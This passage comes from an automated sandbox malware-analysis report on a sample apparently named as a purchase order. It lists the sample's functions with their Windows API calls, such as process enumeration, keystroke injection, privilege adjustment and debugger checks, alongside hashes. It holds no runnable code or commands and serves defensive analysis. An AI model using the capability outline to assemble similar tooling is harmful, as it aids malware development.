                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                          • String ID:
                          • API String ID: 1601658205-0
                          • Opcode ID: be746fcabb8ab993bdbfe034ad2b3eee1cd25b01b8db52d17e7e27e8cfb8a821
                          • Instruction ID: 6d4b1253aea9449c9d9220ecbe10e6b10175184f1f126266efb0c40d866fd7b2
                          • Opcode Fuzzy Hash: be746fcabb8ab993bdbfe034ad2b3eee1cd25b01b8db52d17e7e27e8cfb8a821
                          • Instruction Fuzzy Hash: 1B519471A002109FDB10EF24CC86F6A77E5AB44718F188598F9059F3D3CB75AD42ABE1
                          Function 00F91C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                          • String ID:
                          • API String ID: 292994002-0
                          • Opcode ID: 276f71666de6a36d577f57c5272d3212260aae58c8a9347c4f340d9dc06a6e3d
                          • Instruction ID: f27055aaf3176b89402eb346cfe67e46aa10d9b248203317c48b5f3b66f9e6af
                          • Opcode Fuzzy Hash: 276f71666de6a36d577f57c5272d3212260aae58c8a9347c4f340d9dc06a6e3d
                          • Instruction Fuzzy Hash: 7821A631B402125FEB218F1AD844B667BA5FF85325B198069E8468B351CB75DC42EBD0
                          Function 00F8A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00F8A6AC
                          • Process32FirstW.KERNEL32(00000000,?), ref: 00F8A6BA
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                          • Process32NextW.KERNEL32(00000000,?), ref: 00F8A79C
                          • CloseHandle.KERNEL32(00000000), ref: 00F8A7AB
                            • Part of subcall function 00F1CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00F43303,?), ref: 00F1CE8A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                          • String ID:
                          • API String ID: 1991900642-0
                          • Opcode ID: 5f57ba4e49752f760840f38b761c15f595c198fb702ec6bbede7d34d61e86c1d
                          • Instruction ID: 6bfc59af47158599ccea5d0feb419f01aedd6243a4a09657377e021f382bda72
                          • Opcode Fuzzy Hash: 5f57ba4e49752f760840f38b761c15f595c198fb702ec6bbede7d34d61e86c1d
                          • Instruction Fuzzy Hash: 68516D715083009FD710EF24CC86A6BBBE8FF89754F40891DF58597292EB74D944EBA2
                          Function 00F6AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00F6AAAC
                          • SetKeyboardState.USER32(00000080), ref: 00F6AAC8
                          • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00F6AB36
                          • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00F6AB88
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: KeyboardState$InputMessagePostSend
                          • String ID:
                          • API String ID: 432972143-0
                          • Opcode ID: 29c113153e89ff3aaf4736c11ae99df544df8ae3397ef05a3b8f56690299f1e8
                          • Instruction ID: 7c5e44c28e2ce374d680de814bd0bc35b00d11c1c0dc370b81fe0ec073545e45
                          • Opcode Fuzzy Hash: 29c113153e89ff3aaf4736c11ae99df544df8ae3397ef05a3b8f56690299f1e8
                          • Instruction Fuzzy Hash: 9931F831E40648AEFB35CB658C05BFE7BAAAB85320F04421BF585661D1D3758D81FBA2
                          Function 00F3BB6F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 00F3BB7F
                            • Part of subcall function 00F329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3D7D1,00000000,00000000,00000000,00000000,?,00F3D7F8,00000000,00000007,00000000,?,00F3DBF5,00000000), ref: 00F329DE
                            • Part of subcall function 00F329C8: GetLastError.KERNEL32(00000000,?,00F3D7D1,00000000,00000000,00000000,00000000,?,00F3D7F8,00000000,00000007,00000000,?,00F3DBF5,00000000,00000000), ref: 00F329F0
                          • GetTimeZoneInformation.KERNEL32 ref: 00F3BB91
                          • WideCharToMultiByte.KERNEL32(00000000,?,00FD121C,000000FF,?,0000003F,?,?), ref: 00F3BC09
                          • WideCharToMultiByte.KERNEL32(00000000,?,00FD1270,000000FF,?,0000003F,?,?,?,00FD121C,000000FF,?,0000003F,?,?), ref: 00F3BC36
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                          • String ID:
                          • API String ID: 806657224-0
                          • Opcode ID: 11a9b415fcd39e093d4bf081e6db224d8a19046a4ec0ca62e68d14a71613606f
                          • Instruction ID: 3122bfd8a141fa960a7f6ff5e35d0d2efd05c90014713c508568175e0d11e3ee
                          • Opcode Fuzzy Hash: 11a9b415fcd39e093d4bf081e6db224d8a19046a4ec0ca62e68d14a71613606f
                          • Instruction Fuzzy Hash: 5431AF71904209EFCB11DF69DC90929BBB9FF45371B1442ABE160DB2A1DB319E40FB50
                          Function 00F7CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 00F7CE89
                          • GetLastError.KERNEL32(?,00000000), ref: 00F7CEEA
                          • SetEvent.KERNEL32(?,?,00000000), ref: 00F7CEFE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ErrorEventFileInternetLastRead
                          • String ID:
                          • API String ID: 234945975-0
                          • Opcode ID: 1fd79c43f529831d24dea8d7cce25fec68f204947403f35c6ca1bf80624fe72f
                          • Instruction ID: 19da6cb204daa175b2f552f63803010bb773eb8d3708b6e2130d31668c621140
                          • Opcode Fuzzy Hash: 1fd79c43f529831d24dea8d7cce25fec68f204947403f35c6ca1bf80624fe72f
                          • Instruction Fuzzy Hash: 6321BAB1900705ABEB20DFA5D948BA6B7F8EB40324F10841FE64AD2151E774EE44ABA1
                          Function 00F68298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00F682AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: lstrlen
                          • String ID: ($|
                          • API String ID: 1659193697-1631851259
                          • Opcode ID: 9358a7b94d949fcbb6e5eec2e0333a0e2376bc878b906c67b3cdd0ac28f33378
                          • Instruction ID: 53f318aad80c4e486ce3d0675907bf745807639c38e30b07c7c1a2e9cb280c21
                          • Opcode Fuzzy Hash: 9358a7b94d949fcbb6e5eec2e0333a0e2376bc878b906c67b3cdd0ac28f33378
                          • Instruction Fuzzy Hash: BA323775A007059FCB28CF59C481A6AB7F0FF48760B15C56EE49ADB3A1EB70E942DB40
                          Function 00F75C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 00F75CC1
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00F75D17
                          • FindClose.KERNEL32(?), ref: 00F75D5F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Find$File$CloseFirstNext
                          • String ID:
                          • API String ID: 3541575487-0
                          • Opcode ID: d176b6138eaba02ec0b61051452f2e1d4b449b19571bd740d5bab3bdca2148fe
                          • Instruction ID: 86f37b2c2f08cc34313dc3e82bdd3d371c9cc582ebc083d26595f33e7b0ae46e
                          • Opcode Fuzzy Hash: d176b6138eaba02ec0b61051452f2e1d4b449b19571bd740d5bab3bdca2148fe
                          • Instruction Fuzzy Hash: 81519A74A046019FC714CF28C884E96B7E4FF49324F14855EE95A8B3A2CB74FC04EB92
                          Function 00F32622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 00F3271A
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F32724
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00F32731
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          • Opcode ID: fedf2994518bd61acb083c7d41200e5bfb904dc492affbd49301697a00693db4
                          • Instruction ID: ba0480d7984b169649a6d469d947b5a6562ae9530ada2193db8dd297be4d2231
                          • Opcode Fuzzy Hash: fedf2994518bd61acb083c7d41200e5bfb904dc492affbd49301697a00693db4
                          • Instruction Fuzzy Hash: B631D77591122CABCB61DF64DC89B9CB7B8BF08320F5041DAE40CA7261E7349F819F84
                          Function 00F751CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00F751DA
                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F75238
                          • SetErrorMode.KERNEL32(00000000), ref: 00F752A1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ErrorMode$DiskFreeSpace
                          • String ID:
                          • API String ID: 1682464887-0
                          • Opcode ID: 16345a4ef3b3adeb791ea0220922a3d4c16e91c1786b8657a66d4a1033865efa
                          • Instruction ID: 790ca00259edbcfc45e2a19de466ea7191111ff6782ab779528fbedd5e19f2f2
                          • Opcode Fuzzy Hash: 16345a4ef3b3adeb791ea0220922a3d4c16e91c1786b8657a66d4a1033865efa
                          • Instruction Fuzzy Hash: 3E316175A00518DFDB00DF54D884EADBBF4FF49314F088099E809AB3A2DB75E856DBA1
                          Function 00F616C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F1FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00F20668
                            • Part of subcall function 00F1FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00F20685
                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F6170D
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F6173A
                          • GetLastError.KERNEL32 ref: 00F6174A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                          • String ID:
                          • API String ID: 577356006-0
                          • Opcode ID: df6b58ab29503ded93a9c2a8f9b4add7834839a7d2c177cfc003f66743bb42ff
                          • Instruction ID: 9122121bb26d3e9ea4c8c294381f12b0f13e4d67cfbbc343579fb9536d1dd40b
                          • Opcode Fuzzy Hash: df6b58ab29503ded93a9c2a8f9b4add7834839a7d2c177cfc003f66743bb42ff
                          • Instruction Fuzzy Hash: 361191B2404308AFD7189F54EC86DAAB7B9FB44714B24852EE05697251EB70BC459B60
                          Function 00F6D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F6D608
                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00F6D645
                          • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F6D650
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CloseControlCreateDeviceFileHandle
                          • String ID:
                          • API String ID: 33631002-0
                          • Opcode ID: d0db568efcb627caa7ac7ed92d3d8093a69a0564875f26c23efae82b4f2bc326
                          • Instruction ID: c1f47b0b8eb5f5a64959a8322e03794f161d2fa06aaa0f4b51697669e03d11f7
                          • Opcode Fuzzy Hash: d0db568efcb627caa7ac7ed92d3d8093a69a0564875f26c23efae82b4f2bc326
                          • Instruction Fuzzy Hash: 6A115E75E05228BFDB108F95DC45FAFBBBCEB45B60F108116F904E7290D6704A059BE1
                          Function 00F61663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                          Download Yara Rule
                          APIs
                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00F6168C
                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F616A1
                          • FreeSid.ADVAPI32(?), ref: 00F616B1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: AllocateCheckFreeInitializeMembershipToken
                          • String ID:
                          • API String ID: 3429775523-0
                          • Opcode ID: ea7c271e9310a2ce0891eb27337715b9ace55b5aafc916ed7fa496f58607bfb1
                          • Instruction ID: 1ed5e520118a61e01e294dd86122da0f97e4e5eaf99f14929e9d25e53b5e2ddb
                          • Opcode Fuzzy Hash: ea7c271e9310a2ce0891eb27337715b9ace55b5aafc916ed7fa496f58607bfb1
                          • Instruction Fuzzy Hash: FAF0447194030CFBDB00CFE0CC89AAEBBBCFB08200F404561E500E2190E331AA049A90
                          Function 00F24CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(00F328E9,?,00F24CBE,00F328E9,00FC88B8,0000000C,00F24E15,00F328E9,00000002,00000000,?,00F328E9), ref: 00F24D09
                          • TerminateProcess.KERNEL32(00000000,?,00F24CBE,00F328E9,00FC88B8,0000000C,00F24E15,00F328E9,00000002,00000000,?,00F328E9), ref: 00F24D10
                          • ExitProcess.KERNEL32 ref: 00F24D22
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Process$CurrentExitTerminate
                          • String ID:
                          • API String ID: 1703294689-0
                          • Opcode ID: e60c9465bcf3466d4b8d59c7bf7af4385d865f148a5f1fc42503614a55cb429d
                          • Instruction ID: 28552e9beecda08934f867085d898d13f428062548e5e269a8447d6a9857297b
                          • Opcode Fuzzy Hash: e60c9465bcf3466d4b8d59c7bf7af4385d865f148a5f1fc42503614a55cb429d
                          • Instruction Fuzzy Hash: 41E0B631800158AFCF11AF54EE0AE583B69EB41B91F504015FD098B122CB79ED42EA90
                          Function 00F5D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • GetUserNameW.ADVAPI32(?,?), ref: 00F5D28C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: NameUser
                          • String ID: X64
                          • API String ID: 2645101109-893830106
                          • Opcode ID: 099b942afdf2a85f542ce5e4e974818bf42157660f47a3a0ea5a70efcc239e2e
                          • Instruction ID: ac5d733dd24e62b4d303f2172ae4a3016575b9d97a8dc23b5796933f834913c4
                          • Opcode Fuzzy Hash: 099b942afdf2a85f542ce5e4e974818bf42157660f47a3a0ea5a70efcc239e2e
                          • Instruction Fuzzy Hash: 14D0C9B580111DEECB94CB90DC88EDDB37CBB04305F100152F506E2000D7709548AF20
                          Function 00F2CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                          • Instruction ID: 7ffd6950c50fc709e565be718bd536ba32cfd53d819aeab46ff1c625d6e5293d
                          • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                          • Instruction Fuzzy Hash: 9C023D72E011299BDF14CFA9D9806ADBBF1EF88324F25416AD919E7380D731AA419BD0
                          Function 00F768EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 00F76918
                          • FindClose.KERNEL32(00000000), ref: 00F76961
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID:
                          • API String ID: 2295610775-0
                          • Opcode ID: ed7dbc95e444be56d654245e36cda454b5ffabc59965f7d99a1d227b68a37c0b
                          • Instruction ID: 8bb79e3a54329c9e9b80c8933b1288558c22bdbb6ae1ee73c94126b46546c673
                          • Opcode Fuzzy Hash: ed7dbc95e444be56d654245e36cda454b5ffabc59965f7d99a1d227b68a37c0b
                          • Instruction Fuzzy Hash: EC11D0716046019FC710DF29C884A26BBE1FF84328F04C69AE5698F2A2CB34EC05DBD1
                          Function 00F737B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00F84891,?,?,00000035,?), ref: 00F737E4
